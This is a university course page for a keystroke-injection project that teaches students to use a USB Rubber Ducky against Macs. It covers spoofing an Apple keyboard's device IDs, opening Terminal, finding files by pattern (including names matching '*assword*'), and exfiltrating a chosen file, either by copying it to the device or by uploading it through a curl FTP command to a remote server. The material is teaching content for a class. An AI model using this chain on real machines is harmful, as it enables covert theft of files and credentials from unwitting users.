[ Links open in: same window | new window ]

Radical Software

LCST 2234, Fall 2024 (CRN 9430)
Rory Solomon

Project 2, Keystroke Injection Attack

This page includes a handful of techniques that you might want to use for this project.

Reminder that you can find a PDF of the project assignment here.

Table of contents

  1. Overview
  2. Preventing the keyboard identification popup
  3. Screenshots
  4. Command line
  5. Opening popups
  6. Accessing files
    1. Listing files with ls
    2. Linking commands together with pipe (|)
    3. Selecting parts of the output of a command with head
    4. Putting the above together to get a filename
    5. Saving the filename to use later with shell variables
    6. Regular files only and more advanced filtering with find
    7. Putting it all together
  7. Data exfiltration
    1. Physical Medium Exfiltration: Copying files to your Rubber Ducky
    2. Network Medium Exfiltration: Transfering files to a server

01. Overview

Remember that you can do anything with DuckyScript that you can do with a keyboard — which is more or less just about anything that you can do on a computer!

You might want to experiment with things you can do with keyboard only — i.e. without using the mouse to click on items in the GUI. You may find that there is a suprpisingly huge amount of things you can do without your mouse! Start experimenting with them.

On Mac, we can go into System Preferences, then Keyboard, then click "Keyboard Shortcuts" and explore all the various keyboard shortcuts that your system has configured. If you don't have a lot of custom shortcuts configured, these should be the same as most other users.

(Click to enlarge.)

You could also simply search online for other standard keyboard shortcuts for your OS. Explore and get creative!

02. Preventing the keyboard identification popup

First off, before getting creative with some keyboard shortcuts, let's try to remedy that keyboard identification pop-up that we see when we connect a Rubber Ducky to a Mac target for the first time. As explained by the Hak5 documentation in this article on Attack Modes, that popup window that we often see is because Mac cannot identify the type of keyboard device being connected. You can prevent this by faking a device identifier using the ATTACKMODE command, like this:

ATTACKMODE HID VID_05AC PID_021E
So you might want to add that as the first line of any scripts.

Note on formatting: In these notes, any text like this:
fixed width font on a blue background
is valid DuckyScript that you can copy/paste into the Hak5 Payload Studio, while any text like this:
fixed width font on a black background
is valid code for the command line, which you should be able to copy/paste into the Terminal, or copy/paste into DuckyScript as commands to be run in the terminal, probably via the STRING command.

The above ATTACKMODE command will put your Rubber Ducky into HID mode, which stands for human input device, i.e. acting like a keyboard. This means that it will not be visible as a USB storage device. If you want to do that, the command is:

ATTACKMODE STORAGE
Fortunately, the ATTACKMODE command allows us to specify multiple modes, so to have the Rubber Ducky act like a keyboard and a USB storage device, use the following command:
ATTACKMODE STORAGE HID VID_05AC PID_021E

03. Screenshots

Now back to thinking up some interesting keyboard shortcuts ...

One example of some keyboard shortcuts that come to mind are the various commands for making screenshots. On Mac, the default keyboard shortcut for taking screenshots is:

SHIFT COMMAND 3
Note that this is a default shortcut and some users may have it changed. But for most people, that default is probably what is configured. If you run that in DuckyScript, you will now have a screenshot file that you can try to experiment with.

If you want to see the other keyboard shortcuts for screenshots, or see how these shortcuts may be differently configured on a given system, you can find them in the "Screenshots" section of the "Keyboard Shortcuts" popup:

(Click to enlarge.)

The default location for a screenshot file is usually in the Desktop folder. Below we'll see how we can experiment with doing something with it.

(jump back up to table of contents)

04. The command line

Since this is keyboard-based attack, if you want to go beyond general OS-level keyboard shortcuts you will get a lot more mileage out of working within a terminal — since that is a text-based interface and you will thus be able to do a lot with just the keyboard there.

Once you get into the command line, you can do just about anything on the computer just by using text-based commands that you can execute via DuckyScript.

Again on Mac, you can open a Terminal by typing COMMAND SPACE for spotlight, then "Terminal", then enter. So in DuckyScript, this would be:

COMMAND SPACE
STRINGLN Terminal
Although some folks in class pointed out that Spotlight can take a little time to do its thing, so you might want to do something like this:
COMMAND SPACE
STRING Terminal
DELAY 100
ENTER
Remember that STRINGLN is just a shortcut for STRING followed by ENTER. The second snippet above enters the text and then waits a short bit before hitting ENTER to give that time to Spotlight.

(jump back up to table of contents)

05. Opening popups

In the command line you can type open and then any file or URL to open that resource in the appropriate application.

Try opening a URL:

open "https://phrack.org/issues/7/3.html"
You could use this technique to "RickRoll" someone, or open a custom message or image that you create. If you want to do this, let me know and I can host that image or webpage for you on our departmental server.

(jump back up to table of contents)

06. Accessing files

Let's experiment with command line commands and shell scripting.

(a) Listing files with ls

You can list the files in a directory (i.e. a folder) with the ls command (that's a lower-case "L").

ls

This command takes different arguments, also known as parameters or flags, which are usually indicated with a hyphen -.

Adding -1 (that's the number one) to the ls command will list all the files in one single column, which makes it a little easier to work with in other ways:

ls -1

(b) Linking commands together with pipe (|)

The real magic and power of working in the command line comes from using something called the pipe command, specified with a vertical line usually refered to as a bar: |. On my keyboard, you can find that by typing SHIFT and backslash (\), which is above the RETURN key.

This tool let's you take the output from one command and send it as the input to another command.

(c) Selecting parts of the output of a command with head

Another useful command in this case is head. This returns only the first number of lines from a file. For example, if I had a file named data.txt that contained the following:

Hello my name is Gritty
I am orange
I am a monster
I like hockey
I like pranks
and you typed head -2 data.txt, you would get the following output:
Hello my name is Gritty
I am orange

(jump back up to table of contents)

(d) Putting the above together to get a filename

Putting the above three things together, we can get the name of one file to work with:

ls -1 | head -1
This will return the name of the first file in the current directory.

I say first, but more precisely, this will be the first file in terms of whatever the default sorting is, which is usually alphanetical. You can change the sort order with various parameters:

And you can combine these parameters, so to get the oldest accessed file, you could do: ls -1ur | head -1. Or combine those parameters however you'd like.

There is also a command called sort which offers more sorting options, including a randomized sort with the -R option. Use the pipe command with ls to select a random file, like this:

ls -1 | sort -R | head -1
Run that few times to see what you get

(jump back up to table of contents)

(e) Saving the filename to use later with shell variables

In bash shell scripting, you can save the output from a command into a variable with the following syntax, where NAME is any variable name, and COMMAND is any set of commands:

NAME="$(COMMAND)"
Putting the above together would look like this:
FILENAME="$(ls -1 | sort -R | head -1)"
Now you can use that value by typing $FILENAME in any other command. We'll see some things you can do with that filename below.

(f) Regular files only and more advanced filtering with find

You may have noticed that ls lists files and directories (folders). So if you are in a directory (folder) that contains other directories (i.e. subdirectories or subfolders), then those will be listed. Now if you are trying to do something with a file, you may not want to possibly get a directory name.

Unfortunately the ls command does not let you filter out directories, but another command does called find, which is a very powerful command that can search through all subdirectories and take many different filtering options.

The first argument to find is always the directory that you want to search. To just search the current directory, use "." (a period, usually referred to as dot).

By default, find recursively looks through all subdirectories and their subdirectories, etc. So if you want to achieve similar behavior to ls, add the -maxdepth 1 parameter. Like this:

find . -maxdepth 1

Now we can add a filter so that find only returns regular files, i.e. not directories. For this, use the -type option, like this, with f for "file":

find . -maxdepth 1 -type f

NOTE: If you leave out -maxdepth, it will search through all subdirectories, which, depending on what folder you're in could be a lot!!! To stop this command (or any command) from running, hit CONTROL-C.

Both ls and find can accept a different path naming the directory that you want to search. For example, try

ls /Applications
or
find /Applications -maxdepth 1
to see a list of what applications are installed on this system.

Now with ls, this isn't quite as useful for what we're trying to do because that only returns a filename. But find returns the full path, which is what we would need if we wanted to access this file in some way.

find also lets you filter in all kinds of ways. You can look these up online. But one technique we can look at here is by name.

You can use the -name parameter to look only for a specific filename, or use wildcard characters to look for certain patterns. For example this:

find . -maxdepth 1 -type f -name "*assword*"
will look for any regular files in the current directory that could be named "Password" or "password".

Putting these together might be a good time to not use maxdepth. For example this:

find . -type f -name "*assword*"
would look for any files in the current directory or any subdirectory that match that filename pattern.

(jump back up to table of contents)

(g) Putting it all together

Combining the above techniques, here is a command that looks for all files matching this filename pattern, in the Documents directory or any subdirectory, and by sorting randomly it will return a different file each time it runs, saving that in a variable:

FILENAME="$(find Documents -type f -name "*.txt" |sort -R |head -1)"

(jump back up to table of contents)

07. Exfiltration

Now that we have a variable containing a filename, we can do many things with it.

Exfiltration is the cybersecurity term for the unauthorized transfer of data from a computer (wikipedia).

The USB Rubber Ducky offers us two main techniques for exfiltrating data that we wish to extract from a target machine. The Hak5 documentation calls these "Physical Medium Exfiltration" and "Network Medium Exfiltration", which essentially means copying files directly to the USB storage device and transfering files over a network, respectively. These two techniques are explained below.

(a) Physical Medium Exfiltration: Copying files to your Rubber Ducky

On Mac, a Rubber Ducky that is plugged in and in the STORAGE attack mode will be accessible in the command line as /Volumes/DUCKY.

You can copy files with the cp command, and using that with the filename variable above would look like this:

cp $FILENAME /Volumes/DUCKY
With that, you should be able to pop in the Rubber Ducky, wait a few seconds, pull it out, and have whatever file you've searched for copied off the target machine.

(b) Network Medium Exfiltration: Transfering files to a server

In addition to copying the file to USB, we can try to copy the file to a remote server.

I've setup an FTP server for us with an account and password that we all can use. There are several different ways that you could do this, but one comamnd you could use is this:

curl --user USERNAME:PASSWORD --upload-file $MYVARIABLE ftp://SERVER

I feel pretty lax about sharing the username, password, and server name, but I still don't think it's too wise to simply post it on the web for anyone to see, so I moved that info into a Google Doc that only we can access. You can find that here.

If you try this command and want to know whether the upload worked, you can download an FTP client (I recommend Cyberduck) and login with the credentials in the Google Doc file — or just ask me whether it worked.

I'll be checking that server and I want to see some files getting uploaded!

Putting all that together, here is a sample payload I put together that takes a screenshot and uploads it via FTP. You can see where I've added some various DELAY commands, based on testing and seeing how long different steps took.

project2-sample-payload.txt

(As above, I have not incldued the actual username, password, and server name in that txt file. To see these, please take a look at this doc here.)